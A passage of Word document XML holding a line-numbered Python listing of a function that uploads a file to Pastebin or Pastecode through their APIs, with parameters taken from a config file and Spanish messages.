      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># : service = 2 =&gt; Pastecode     https://pastecode.xyz/api       example: https://pastecode.xyz/view/722cfc48</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="687" w:name="l340"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">340  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="687"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>paste_file</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>file_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>servic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88" w:name="l341"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">341  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="688"/>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89" w:name="l342"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">342  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="689"/>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690" w:name="l343"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">343  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="690"/>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91" w:name="l344"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">344  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="691"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">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BIN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BIN_ENABLED</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>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692" w:name="l345"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">345  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="692"/>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BIN_POST_URL                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Post url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="693" w:name="l346"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">346  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="693"/>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694" w:name="l347"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">347  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="694"/>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api_dev_key'</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API_DEV_KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">),    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Our dev key (see config.py)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="695" w:name="l348"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">348  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="695"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'api_option'</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OPTION</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="696" w:name="l349"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">349  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="696"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'api_paste_cod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7" w:name="l350"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">350  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="697"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'api_paste_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8" w:name="l351"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">351  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="698"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'api_paste_forma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FORMAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="699" w:name="l352"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">352  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="699"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'api_paste_private'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>int</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RIVATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="700" w:name="l353"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">353  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="700"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'api_paste_expire_dat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OST_EXPIRE</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="701" w:name="l354"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">354  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="701"/>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702" w:name="l355"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">355  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="702"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># If not set user and pass an anonymous paste is made</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="703" w:name="l356"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">356  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="703"/>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 xml:space="preserve">PASTEBIN_USER_NAME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704" w:name="l357"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">357  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="704"/>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name'</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USER_NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="705" w:name="l358"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">358  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="705"/>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password'</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ASSWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="706" w:name="l359"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">359  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="706"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="707" w:name="l360"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">360  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="70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08" w:name="l361"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">361  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="708"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">el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CODE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CODE_ENABLED</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>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709" w:name="l362"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">362  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="709"/>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CODE_POST_URL                       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Post url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="710" w:name="l363"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">363  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="710"/>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711" w:name="l364"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">364  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="711"/>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tex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12" w:name="l365"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">365  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="712"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'titl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13" w:name="l366"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">366  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="713"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'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APPNAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="714" w:name="l367"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">367  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="714"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'privat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RIVATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">,                </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># 1 = private</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="715" w:name="l368"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">368  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="715"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'languag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FORMAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="716" w:name="l369"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">369  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="716"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'expir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EXPIRE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="717" w:name="l370"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">370  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="717"/>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718" w:name="l371"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">371  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="71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19" w:name="l372"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">372  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="71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20" w:name="l373"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">373  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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ta activado ningun servicio de Paste'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="721" w:name="l374"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">374  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="721"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="722" w:name="l375"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">375  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="722"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">paste_service_url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723" w:name="l376"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">376  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="723"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Encode data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="724" w:name="l377"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">377  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="724"/>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urlencode</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25" w:name="l378"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">378  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="725"/>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data_encoded</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26" w:name="l379"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">379  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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Parametros codificados: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27" w:name="l380"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">380  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="727"/>
    </w:p>
